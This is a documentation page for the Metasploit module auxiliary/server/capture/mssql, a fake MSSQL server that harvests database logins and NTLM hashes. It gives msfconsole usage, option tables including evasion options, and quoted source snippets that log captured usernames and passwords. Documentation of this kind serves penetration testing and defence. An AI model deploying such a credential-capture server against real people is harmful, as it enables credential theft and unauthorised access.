Authentication Capture: MSSQL - Metasploit
This page contains detailed information about how to use the auxiliary/server/capture/mssql metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Authentication Capture: MSSQL
Module: auxiliary/server/capture/mssql
Source code: modules/auxiliary/server/capture/mssql.rb
Disclosure date: -
Last modification time: 2021-01-28 10:35:25 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module provides a fake MSSQL service that is designed to capture authentication credentials. The modules supports both the weak encoded database logins as well as Windows logins (NTLM).
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/server/capture/mssql
msf auxiliary(mssql) > show targets
... a list of targets ...
msf auxiliary(mssql) > set TARGET target-id
msf auxiliary(mssql) > show options
... show and set options ...
msf auxiliary(mssql) > exploit
Go back to menu.
Msfconsole Usage
Here is how the server/capture/mssql auxiliary module looks in the msfconsole:
msf6 > use auxiliary/server/capture/mssql
msf6 auxiliary(server/capture/mssql) > show info
Name: Authentication Capture: MSSQL
Module: auxiliary/server/capture/mssql
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Patrik Karlsson <[email protected]>
Available actions:
Name Description
---- -----------
Capture Run MSSQL capture server
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no The local filename to store the hashes in Cain&Abel format
CHALLENGE 1122334455667788 yes The 8 byte challenge
JOHNPWFILE no The prefix to the local filename to store the hashes in JOHN format
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 1433 yes The local port to listen on.
Description:
This module provides a fake MSSQL service that is designed to
capture authentication credentials. The modules supports both the
weak encoded database logins as well as Windows logins (NTLM).
Module Options
This is a complete list of options available in the server/capture/mssql auxiliary module:
msf6 auxiliary(server/capture/mssql) > show options
Module options (auxiliary/server/capture/mssql):
Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no The local filename to store the hashes in Cain&Abel format
CHALLENGE 1122334455667788 yes The 8 byte challenge
JOHNPWFILE no The prefix to the local filename to store the hashes in JOHN format
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 1433 yes The local port to listen on.
Auxiliary action:
Name Description
---- -----------
Capture Run MSSQL capture server
Advanced Options
Here is a complete list of advanced options supported by the server/capture/mssql auxiliary module:
msf6 auxiliary(server/capture/mssql) > show advanced
Module advanced options (auxiliary/server/capture/mssql):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN_NAME anonymous yes The domain name used during smb exchange with smb extended security set
ListenerComm no The specific communication channel to use for this service
SMBServerIdleTimeout 120 yes The maximum amount of time to keep an idle session open in seconds
SMBServerMaximumBuffer 2 yes The maximum number of data in megabytes to buffer
SMB_EXTENDED_SECURITY false yes Use smb extended security negociation, when set client will use ntlmssp, if not then client will use classic lanman authentification
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the server/capture/mssql module can do:
msf6 auxiliary(server/capture/mssql) > show actions
Auxiliary actions:
Name Description
---- -----------
Capture Run MSSQL capture server
Evasion Options
Here is the full list of possible evasion options supported by the server/capture/mssql auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(server/capture/mssql) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
- CHALLENGE syntax must match 1122334455667788
- Login packet to short
- Failed to find NTLMSSP authentication blob
- Error processing Hash from <SMB:NAME> : <E.CLASS> <E> <E.BACKTRACE>
- Unsupported NTLM authentication message type
- unsupported token: <TOKEN>
- <INFO:ERRORS>
- Error: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
- Login failed for user '<INFO:USER>'.
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
CHALLENGE syntax must match 1122334455667788
Here is a relevant code snippet related to the "CHALLENGE syntax must match 1122334455667788" error message:
64: @s_smb_esn = datastore['SMB_EXTENDED_SECURITY']
65: @domain_name = datastore['DOMAIN_NAME']
66: if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/
67: @challenge = [ datastore['CHALLENGE'] ].pack("H*")
68: else
69: print_error("CHALLENGE syntax must match 1122334455667788")
70: return
71: end
72:
73: # those variables will prevent to spam the screen with identical hashes (works only with ntlmv1)
74: @previous_lm_hash="none"
Login packet to short
Here is a relevant code snippet related to the "Login packet to short" error message:
106: def mssql_parse_login(data, info)
107: status = data.slice!(0,1).unpack('C')[0]
108: len = data.slice!(0,2).unpack('n')[0]
109:
110: if len > data.length + 4
111: info[:errors] << "Login packet to short"
112: return
113: end
114:
115: # slice of:
116: # * channel, packetno, window
Failed to find NTLMSSP authentication blob
Here is a relevant code snippet related to the "Failed to find NTLMSSP authentication blob" error message:
345: def mssql_parse_ntlmsspi(data, info)
346: start = data.index('NTLMSSP')
347: if start
348: data.slice!(0,start)
349: else
350: print_error("Failed to find NTLMSSP authentication blob")
351: return
352: end
353:
354: ntlm_message = NTLM_MESSAGE::parse(data)
355: case ntlm_message
Error processing Hash from <SMB:NAME> : <E.CLASS> <E> <E.BACKTRACE>
Here is a relevant code snippet related to the "Error processing Hash from <SMB:NAME> : <E.CLASS> <E> <E.BACKTRACE>" error message:
389: arg[:host] = info[:ip]
390:
391: begin
392: mssql_get_hash(arg)
393: rescue ::Exception => e
394: print_error("Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
395: end
396: else
397: info[:errors] << "Unsupported NTLM authentication message type"
398: end
399:
Unsupported NTLM authentication message type
Here is a relevant code snippet related to the "Unsupported NTLM authentication message type" error message:
392: mssql_get_hash(arg)
393: rescue ::Exception => e
394: print_error("Error processing Hash from #{smb[:name]} : #{e.class} #{e} #{e.backtrace}")
395: end
396: else
397: info[:errors] << "Unsupported NTLM authentication message type"
398: end
399:
400: # slice of remainder
401: data.slice!(0,data.length)
402: end
unsupported token: <TOKEN>
Here is a relevant code snippet related to the "unsupported token: <TOKEN>" error message:
418: info[:type] = Constants::TDS_MSG_PRELOGIN
419: when Constants::TDS_MSG_SSPI
420: mssql_parse_ntlmsspi(data, info)
421: info[:type] = Constants::TDS_MSG_SSPI
422: else
423: info[:errors] << "unsupported token: #{token}"
424: end
425: end
426: info
427: end
428:
<INFO:ERRORS>
Here is a relevant code snippet related to the "<INFO:ERRORS>" error message:
500: return if not data
501:
502: info = mssql_parse_reply(data, info)
503:
504: if(info[:errors] and not info[:errors].empty?)
505: print_error("#{info[:errors]}")
506: c.close
507: return
508: end
509:
510: # no errors, and the packet was a prelogin
Error: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.
Here is a relevant code snippet related to the "Error: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication." error message:
514: case info[:type]
515: when Constants::TDS_MSG_PRELOGIN
516: mssql_send_prelogin_response(c, info)
517:
518: when Constants::TDS_MSG_SSPI
519: mssql_send_error(c, "Error: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.")
520:
521: when Constants::TDS_MSG_LOGIN
522: if info[:isntlm?] == true
523: mssql_send_ntlm_challenge(c, info)
524: elsif info[:user] and info[:pass]
Login failed for user '<INFO:USER>'.
Here is a relevant code snippet related to the "Login failed for user '<INFO:USER>'." error message:
531: :source_type => "captured",
532: :active => true
533: )
534:
535: print_status("MSSQL LOGIN #{@state[c][:name]} #{info[:user]} / #{info[:pass]}")
536: mssql_send_error(c, "Login failed for user '#{info[:user]}'.")
537:
538: c.close
539: end
540: end
541: end
Go back to menu.
Related Pull Requests
- #14696 Merged Pull Request: Zeitwerk rex folder
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #9897 Merged Pull Request: Fix #8404 ListenerComm Support For Exploit::Remote::TcpServer
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5059 Merged Pull Request: Yard doc corrections
- #4768 Merged Pull Request: Reorganize SMB mixins
- #2525 Merged Pull Request: Change module boilerplate
- #602 Merged Pull Request: Review of pull request #598
Go back to menu.
See Also
Check also the following modules related to this module:
- auxiliary/server/capture/drda
- auxiliary/server/capture/ftp
- auxiliary/server/capture/http
- auxiliary/server/capture/http_basic
- auxiliary/server/capture/http_javascript_keylogger
- auxiliary/server/capture/http_ntlm
- auxiliary/server/capture/imap
- auxiliary/server/capture/mysql
- auxiliary/server/capture/pop3
- auxiliary/server/capture/postgresql
- auxiliary/server/capture/printjob_capture
- auxiliary/server/capture/sip
- auxiliary/server/capture/smb
- auxiliary/server/capture/smtp
- auxiliary/server/capture/telnet
- auxiliary/server/capture/vnc
- auxiliary/admin/mssql/mssql_enum
- auxiliary/admin/mssql/mssql_enum_domain_accounts
- auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli
- auxiliary/admin/mssql/mssql_enum_sql_logins
- auxiliary/admin/mssql/mssql_escalate_dbowner
- auxiliary/admin/mssql/mssql_escalate_dbowner_sqli
- auxiliary/admin/mssql/mssql_escalate_execute_as
- auxiliary/admin/mssql/mssql_escalate_execute_as_sqli
- auxiliary/admin/mssql/mssql_exec
- auxiliary/admin/mssql/mssql_findandsampledata
- auxiliary/admin/mssql/mssql_idf
- auxiliary/admin/mssql/mssql_ntlm_stealer
- auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
- auxiliary/admin/mssql/mssql_sql
- auxiliary/admin/mssql/mssql_sql_file
- auxiliary/scanner/mssql/mssql_hashdump
- auxiliary/scanner/mssql/mssql_login
- auxiliary/scanner/mssql/mssql_ping
- auxiliary/scanner/mssql/mssql_schemadump
Authors
Patrik Karlsson <patrik[at]cqure.net>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.